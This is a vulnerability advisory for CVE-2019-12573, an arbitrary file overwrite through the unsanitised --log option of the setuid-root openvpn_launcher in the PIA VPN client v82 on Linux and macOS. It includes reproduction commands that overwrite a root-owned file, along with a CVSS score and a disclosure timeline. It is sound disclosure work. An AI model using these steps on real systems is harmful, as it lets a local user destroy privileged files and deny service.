CVE-2019-12573.txt

Title: PIA Linux, macOS Arbitrary File Overwrite

Author: Rich Mirch

CVE: CVE-2019-12573

Vendor Advisory: N/A

Description

A vulnerability in the London Trust Media Private Internet Access (PIA)
VPN Client v82 for Linux and macOS could allow an authenticated, local
attacker to overwrite arbitrary files.

The PIA Linux and macOS openvpn_launcher binary is setuid root. This
binary supports the --log option which accepts a path as an argument.
The --log parameter is not sanitized which allows a local unprivileged
to overwrite arbitrary files owned by any user on the system, including
root. This creates a denial of service condition and possible data loss
if leveraged by a malicious local user.


CVSS

Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H/E:H/RL:U/RC:C
Base: 7.1
Temporal: 7.1


Test Environment

OS: Ubuntu 18.04.1 LTS
Kernel: 4.15.0-29-generic
PIA Version: v82

OS: macOS Mojave 10.14.1
Kernel: Darwin Kernel Version 18.2.0
PIA Version: v82


Steps to reproduce


Step 1 - Create a root owned test file. For this PoC /etc/test.txt is used.

# As root
echo "this is a test" > /etc/test.txt
chmod 600 /etc/test.txt


Step 2 - Overwrite the file using the --log option using a non privileged user.

# macOS
/Applications/Private\ Internet\ Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt

# Linux
/opt/pia/openvpn_launcher.64 --log /etc/test.txt


Step 3 - Verify the file contents have been overwritten

# As root
cat /etc/test.txt


Timeline:

2018-12-23: Reported to vendor
2018-12-23: Vendor acknowledged receipt of report
2019-01-18: Vendor states fix will be available in v83 however this version was never released.
            The desktop client was re-written. Upgrade to v1.2.1+ of the new client.
2019-06-10: Public disclosure